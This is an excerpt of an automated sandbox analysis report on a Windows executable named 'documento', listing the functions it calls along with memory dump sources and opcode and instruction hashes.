                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 318c8869c664b65327b47b9f35d6847cb303a6655a32462d5bdd6235084e72f0
                                                • Instruction ID: a0e6ef5e26ee6ddc4bb0604ab4126291559e87657aa933595c84d6ace612bc1e
                                                • Opcode Fuzzy Hash: 318c8869c664b65327b47b9f35d6847cb303a6655a32462d5bdd6235084e72f0
                                                • Instruction Fuzzy Hash: 9AD0C972908120EBC2102738BE0C89BBB55DB542717058B31F969B22F0C7304C56CA95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405459 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateDirectoryA.KERNELBASE(?,00000000,004030CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032CD), ref: 0040545F
                                                • GetLastError.KERNEL32 ref: 0040546D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                • Instruction ID: c1acecc5f45fa991ae160619e34a4bf2a4a440633476f6552c0bcd7b2c81b644
                                                • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                                • Instruction Fuzzy Hash: D3C04C30B59502DAD6105B309E08B577D54AB50742F1449756546E10E0D6349451DD2F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401662 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MoveFileA.KERNEL32(00000000,00000000), ref: 0040167D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: 52dd1c4c2d123aabde52000435b878d08d2c9e96ca10076c7107822555445b84
                                                • Instruction ID: b2fa69e3c01cfbe572ec2dbf0bcaa4908bc9cb815e6a1824dfc5ffdb45a29167
                                                • Opcode Fuzzy Hash: 52dd1c4c2d123aabde52000435b878d08d2c9e96ca10076c7107822555445b84
                                                • Instruction Fuzzy Hash: 7CF0B435A08120ABDF20BBA58E0DE4F21A5AB6136DB34477BB112B61D1DAFD850185AF
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402283 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                Download Yara Rule
                                                APIs
                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004022BC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                • Instruction ID: ed5e863b5af70a22674a87f6432e4eb84017b1e79b4e81bbc09640d5f5368664
                                                • Opcode Fuzzy Hash: 4656573f168c310efd594f08e96abc660716981113b3fc3e41d9438b56e455a3
                                                • Instruction Fuzzy Hash: 8AE04F31B001746FDB217AF14E8EE7F11989B84348B64417EF601B62C3DDBC4D434AA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402B44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B6C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                • Instruction ID: 806e3b40af95552ac91145e5354a2e2caa18036cb762c00ee55acc3717e10e35
                                                • Opcode Fuzzy Hash: ed1d997f1767e4ebe1524a955060e6e59f62574de8c72c2eb948d7caa6f8d669
                                                • Instruction Fuzzy Hash: D3E04FB6240108AFDB00EFA4DD46FA537ECE714701F008021B608D6091C674E5108B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405A17 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405A2B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                • Instruction ID: 26d326ee603fa64f849cef49f4367d8274c9975adadc9b0c70b30f96b952ad65
                                                • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                • Instruction Fuzzy Hash: 66E08C3261026AAFDF109EA18C40EEB3B6CEB04360F008432F911E2140D634EC20DFA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004059E8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004059FC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                • Instruction ID: a6feee173889208d7f2b164ec0c021529dd17bfe6846c5dde0bbd097d282ac69
                                                • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                • Instruction Fuzzy Hash: 44E08632210219ABCF10AE519C44EEB375CFB00350F004833F915F3140D230E8519FA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 02a8e8baa5a524c01434ee569a495eb31e5a41fbc0e4972b747df59c6871b08a
                                                • Instruction ID: c0e7c3dc5a7dcdb4abcf1ae6b2c94b9daad9c86c1f50bd1ad5aacfe77fb55035
                                                • Opcode Fuzzy Hash: 02a8e8baa5a524c01434ee569a495eb31e5a41fbc0e4972b747df59c6871b08a
                                                • Instruction Fuzzy Hash: F6D01D77B14100ABDB10DBA49B0895D77A5A750315B304677D201F11D0D679C5559619
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403EE2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetDlgItemTextA.USER32(?,?,00000000), ref: 00403EFC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: ItemText
                                                • String ID:
                                                • API String ID: 3367045223-0
                                                • Opcode ID: b8cc7b808ad147a2d347a58eef98b844e7198dc1f8f1ec02318c1053d68582be
                                                • Instruction ID: d605ed1088b008874dde4b8a3a9fdf3530a726ea79c7fc97ea5c66f44dfad5b8
                                                • Opcode Fuzzy Hash: b8cc7b808ad147a2d347a58eef98b844e7198dc1f8f1ec02318c1053d68582be
                                                • Instruction Fuzzy Hash: 0DC08C31008200BFD241AB04CC06F0FB398EF90316F10C42EB15CA01D2C634C4208A3A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403F2E Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 708d19ea551109b1b194d4ca49fea76d79e91ad51e4b41d80c3f3ea302a13512
                                                • Instruction ID: a59996f4b7e9e068504c33c606b0867cc0e460aa155bd5cdf8ba5dd419a24ee0
                                                • Opcode Fuzzy Hash: 708d19ea551109b1b194d4ca49fea76d79e91ad51e4b41d80c3f3ea302a13512
                                                • Instruction Fuzzy Hash: 36C04C71B482017ADA21CF509D49F0777696750B41F5544657220E50E0C6B4E450E62D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403F17 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: a8f75893dc3b55aa41c318e2ef09a39cbea3501df151919571824d83d4ea5f90
                                                • Instruction ID: 65dbcc2540e3052566e14dce8ba9d4df8b534898b5f9aa1fd4013fdf277ded57
                                                • Opcode Fuzzy Hash: a8f75893dc3b55aa41c318e2ef09a39cbea3501df151919571824d83d4ea5f90
                                                • Instruction Fuzzy Hash: 62B092B6684200BADE228B00DD09F467AB2E7A8742F008024B200640B0CAB200A1DB19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403091 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 0040309F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                • Instruction ID: 8831d3de15784b4579c3d7b303db9b45d0c358e109056f74ce618eb3ecc3c243
                                                • Opcode Fuzzy Hash: 5ff25966693df5c3ccda7a99ea4025cbe7cf73b83d997e6322396513365c8623
                                                • Instruction Fuzzy Hash: 74B01231544200BFDB214F00DE05F057B21A790700F10C030B344780F082712460EB5D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403F04 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00403CE1), ref: 00403F0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378765928.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.378776216.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.380821342.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_documento.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: ada78b75a849097e4ca9a67b024144bc2dc907817df3d169ae3e4670e3dab934
                                                • Instruction ID: 7637a56702c009cdf6d2df62dbdf6ab1f46e74dd5bb36fdb1abe1d05dca4f055
                                                • Opcode Fuzzy Hash: ada78b75a849097e4ca9a67b024144bc2dc907817df3d169ae3e4670e3dab934
                                                • Instruction Fuzzy Hash: 2EA002754085009BDB125B50FE089557A71B754701721C475B15551075C7315425EB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00404893 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 004048AB
                                                • GetDlgItem.USER32(?,00000408), ref: 004048B6
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404900
                                                • LoadBitmapA.USER32 ref: 00404913
                                                • SetWindowLongA.USER32(?,000000FC,00404E8A), ref: 0040492C
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404940
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404952
                                                • SendMessageA.USER32 ref: 00404968
                                                • SendMessageA.USER32 ref: 00404974
                                                • SendMessageA.USER32 ref: 00404986
                                                • DeleteObject.GDI32(00000000), ref: 00404989
                                                • SendMessageA.USER32 ref: 004049B4
                                                • SendMessageA.USER32 ref: 004049C0
                                                • SendMessageA.USER32 ref: 00404A55
                                                • SendMessageA.USER32 ref: 00404A80
                                                • SendMessageA.USER32 ref: 00404A94
                                                • GetWindowLongA.USER32(?,000000F0), ref: 00404AC3
                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AD1
                                                • ShowWindow.USER32(?,00000005), ref: 00404AE2
                                                • SendMessageA.USER32 ref: 00404BDF
                                                • SendMessageA.USER32 ref: 00404C44
                                                • SendMessageA.USER32 ref: 00404C59
                                                • SendMessageA.USER32 ref: 00404C7D
                                                • SendMessageA.USER32 ref: 00404C9D
                                                • ImageList_Destroy.COMCTL32(00000000), ref: 00404CB2
                                                • GlobalFree.KERNEL32(00000000), ref: 00404CC2
                                                • SendMessageA.USER32 ref: 00404D3B
                                                • SendMessageA.USER32 ref: 00404DE4
                                                • SendMessageA.USER32 ref: 00404DF3
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E13
                                                • ShowWindow.USER32(?,00000000), ref: 00404E61
                                                • GetDlgItem.USER32(?,000003FE), ref: 00404E6C
                                                • ShowWindow.USER32(00000000), ref: 00404E73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.378755948.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.378751171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
